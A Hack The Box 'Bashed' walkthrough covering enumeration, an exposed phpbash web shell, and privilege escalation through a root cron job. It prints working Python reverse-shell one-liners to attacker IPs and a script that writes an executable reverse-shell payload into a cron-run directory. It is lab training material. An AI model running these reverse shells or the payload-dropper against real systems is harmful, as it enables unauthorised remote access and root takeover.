HTB - Bashed

Linux | phpbash

Tools For This Room

  • Pentestmonkey's PHP Reverse Shell (php-reverse-shell.php) - the commonly used PHP reverse shell; download it from pentestmonkey's site

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain a foothold through the phpbash web shell the developer left in /dev

  3. Privesc by switching to scriptmanager with sudo, then dropping a script into /scripts, which root executes on a schedule

Scanning & Enumeration

We start off with nmap and gobuster as is tradition. However, this host doesn't answer nmap's ping probes, so we need the -Pn flag (skip host discovery) or nmap reports the box as down and scans nothing.

nmap -sV -sC -vv -Pn <IP>

Only one port comes back: 80 (HTTP). A full port scan (-p-) run in the background doesn't yield any further open ports.

Let's browse to it and see what we can find:

We find Arrexel's Development Site, and exploring it leads us to Arrexel's github page with an explanation of phpbash.

"phpbash is a standalone, semi-interactive web shell. Its main purpose is to assist in penetration tests where traditional reverse shells are not possible." - Arrexel

This is a huge hint about how we'll be getting a foothold. Before acting on it, let's enumerate further with gobuster.

gobuster dir -u http://<IP> -w <wordlist>

Looks like we have quite a few directories to check out too.

Checking them out doesn't yield much, until we get to /dev.

The listing contains the exact file names from the github repo. Looks like we won't need to find a way to upload phpbash ourselves: the developer already deployed it, unprotected, on the web server.

Gaining Foothold

Simply clicking on "phpbash.php" brings us to this screen, which gives us a shell running as the web server user (www-data).

Navigating around, we find the user flag:

Privilege Escalation

As Arrexel's github page explained, this is a semi-interactive shell: each command runs without a real terminal, so anything that needs a TTY (su, sudo password prompts, editors) won't work. To get around this, let's get a proper reverse shell.

We can do this by uploading the fan-favorite, pentestmonkey's php-reverse-shell.php. As always, we should read through and understand what the script is doing. Doing so, we'll notice we need to change the $ip and $port variables near the top of the file to our own listener's address and port.
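The edit above is easy to get wrong by hand (leaving the shell calling back to 127.0.0.1 is a classic). The following script is an added example, not part of this walkthrough or of pentestmonkey's code: it rewrites the two config lines in a copy of php-reverse-shell.php and refuses to proceed unless it found exactly one $ip and one $port assignment. The embedded PHP fragment is a constructed stand-in for the real file's header (the real file's lines have the same `$ip = '...';` / `$port = ...;` shape), and the file name `setcb.py` is arbitrary.

```python
"""Point pentestmonkey's php-reverse-shell.php at our listener, with a check.

Added example; assumes the target file contains lines of the form
    $ip = '127.0.0.1';  // CHANGE THIS
    $port = 1234;       // CHANGE THIS
which is what the stock script ships with.
"""
import ipaddress
import re

# Constructed stand-in for the top of php-reverse-shell.php (not the real file).
SAMPLE_PHP = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
"""

IP_RE = re.compile(r"^\$ip\s*=\s*'[^']*';", re.M)
PORT_RE = re.compile(r"^\$port\s*=\s*\d+;", re.M)


def set_callback(src, ip, port):
    """Return src with $ip/$port pointed at our listener.

    Raises ValueError if ip is not a valid IPv4 address, port is out of range,
    or the file does not contain exactly one of each assignment, so a silent
    no-op edit can never leave the shell calling back to 127.0.0.1.
    """
    ipaddress.IPv4Address(ip)  # AddressValueError is a ValueError subclass
    if not 1 <= port <= 65535:
        raise ValueError("port out of range: %d" % port)
    if len(IP_RE.findall(src)) != 1 or len(PORT_RE.findall(src)) != 1:
        raise ValueError("expected exactly one $ip and one $port assignment")
    src = IP_RE.sub("$ip = '%s';" % ip, src, count=1)
    src = PORT_RE.sub("$port = %d;" % port, src, count=1)
    return src


def callback_of(src):
    """Parse the callback address back out, for a pre-upload sanity check."""
    ip = re.search(r"^\$ip\s*=\s*'([^']*)';", src, re.M).group(1)
    port = int(re.search(r"^\$port\s*=\s*(\d+);", src, re.M).group(1))
    return ip, port


if __name__ == "__main__":
    # usage: python3 setcb.py php-reverse-shell.php 10.10.14.9 4444 > revshell.php
    import sys
    path, ip, port = sys.argv[1], sys.argv[2], int(sys.argv[3])
    with open(path) as f:
        out = set_callback(f.read(), ip, port)
    sys.stdout.write(out)
```

Run it against your downloaded copy and check `callback_of` on the output before serving the file; the trailing `// CHANGE THIS` comments are left in place so the diff against the original stays small.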

To get our .php file onto the victim machine, we host a web server from the directory containing it (this is the Python 2 module; it serves the current directory on port 8000 by default):

python -m SimpleHTTPServer

Then whip up our netcat listener to catch the shell:

nc -lvnp <port>

Now let's pull it over from the victim's side. The file has to land somewhere that www-data can write and that Apache will serve, otherwise we can't trigger it from the browser. /tmp is writable but not reachable over HTTP; the /uploads directory gobuster found is both (it sits under the web root, /var/www/html on this box), so cd there first:

wget <ourIP>:<ourPort>/revshell.php

Browse to the URL to trigger it:

<IP>/uploads/revshell.php

Alternative for reverse shell

A simpler method is to paste a Python reverse shell one-liner straight into phpbash (replace the IP and port with your own listener's):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

This was found on 0xdf's walkthrough and is much simpler than the upload method above. Great technique to add to our toolbox!

Time to stabilize our new shell into a proper TTY (spawn a pty, background the shell with Ctrl+Z, turn off local echo and line buffering, then foreground it again):

python -c 'import pty;pty.spawn("/bin/bash")'
// ctrl + z //
stty raw -echo && fg
export TERM=xterm

We run the usual suspects for privesc, such as shell history and SUID binaries, and get an interesting hit when running "sudo -l".

This tells us that our current user can run commands as scriptmanager, without a password. Let's switch over to scriptmanager:

sudo -u scriptmanager /bin/bash

Checking out the / directory shows us a directory called scripts, which sticks out because it's the only one not owned by root: it belongs to scriptmanager, which is exactly why the sudo rule matters.

The scripts directory has 2 files, test.py and test.txt:

Checking out test.py:

From this, we gather that test.py writes to test.txt, yet test.txt is owned by root and has a very recent modification time. scriptmanager can't create files as root, so root itself must be running test.py, and doing so repeatedly; a cron job that executes everything in /scripts is the obvious explanation. Since scriptmanager owns the directory, anything we drop into it will be run as root as well. What we'll do is create a python file which will spawn a root reverse shell for us:

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > rev.py

Set up a netcat listener on our attacking machine to catch our root shell:

nc -lvnp 4443

The job fires about once a minute, so after a minute or so we're rewarded with our root shell!
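The reasoning behind this escalation (a directory we can write to, containing a file that root keeps re-writing) is worth turning into a reusable check. The script below is an added example, not from the walkthrough or from the box: it scans the directories you pass it for regular files owned by a given uid that were modified in the last `max_age` seconds and that sit inside a directory the current user can write to, then builds the same kind of Python reverse shell as the one-liner above and `compile()`s it before writing, so a quoting mistake is caught before root runs the file. Directory paths are arguments (on Bashed you would pass /scripts); `make_sample_dir()` builds a constructed scratch directory purely so the scan can be exercised without root, and the file name `cronhunt.py` is arbitrary.

```python
"""Find writable dirs where a privileged user keeps touching files; drop a payload.

Added example (not part of the original walkthrough). The owner to look for
defaults to root (uid 0); the constructed sample directory uses our own uid so
the scan can be demonstrated without privileges.
"""
import os
import stat
import tempfile
import time


def fresh_files_in_writable_dirs(dirs, max_age=120, owner_uid=0, now=None):
    """Return [(dir, name, age_seconds)] for files worth investigating.

    A hit means: we can write into `dir`, and `owner_uid` modified `name`
    within the last `max_age` seconds, i.e. something running as that user is
    actively working in a directory we control.
    """
    now = time.time() if now is None else now
    hits = []
    for d in dirs:
        if not os.path.isdir(d) or not os.access(d, os.W_OK):
            continue  # nothing we plant here would be picked up, or we can't plant
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            try:
                st = os.stat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or st.st_uid != owner_uid:
                continue
            age = now - st.st_mtime
            if 0 <= age <= max_age:
                hits.append((d, name, age))
    return hits


def reverse_shell_source(host, port):
    """Python 2/3 reverse shell: same dup2 technique as the walkthrough's one-liner."""
    src = (
        "import socket,subprocess,os\n"
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
        "s.connect((%r,%d))\n"
        "for fd in (0,1,2): os.dup2(s.fileno(),fd)\n"
        "subprocess.call(['/bin/sh','-i'])\n"
    ) % (host, port)
    compile(src, "<payload>", "exec")  # SyntaxError here, not in root's cron log
    return src


def drop(path, host, port):
    """Write the payload to `path` (e.g. /scripts/rev.py) and make it executable."""
    with open(path, "w") as f:
        f.write(reverse_shell_source(host, port))
    os.chmod(path, 0o755)
    return path


def make_sample_dir():
    """Constructed scenario: one file touched just now, one touched 10 min ago."""
    d = tempfile.mkdtemp(prefix="cronhunt-")
    fresh = os.path.join(d, "fresh.txt")
    stale = os.path.join(d, "stale.txt")
    for p in (fresh, stale):
        with open(p, "w") as f:
            f.write("constructed sample\n")
    old = time.time() - 600
    os.utime(stale, (old, old))
    return d


if __name__ == "__main__":
    import sys
    dirs = sys.argv[1:] or [make_sample_dir()]
    owner = 0 if sys.argv[1:] else os.getuid()
    for d, name, age in fresh_files_in_writable_dirs(dirs, owner_uid=owner):
        print("%s/%s modified by uid %d %.0fs ago" % (d, name, owner, age))
```

On the box, `python3 cronhunt.py /scripts` (or a list of candidate directories from `find / -writable -type d 2>/dev/null`) reports test.txt as a root-owned file modified seconds ago; rerunning it a minute later and seeing the age reset is the confirmation that a scheduled job, not a one-off, is responsible.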

Let's grab that flag:
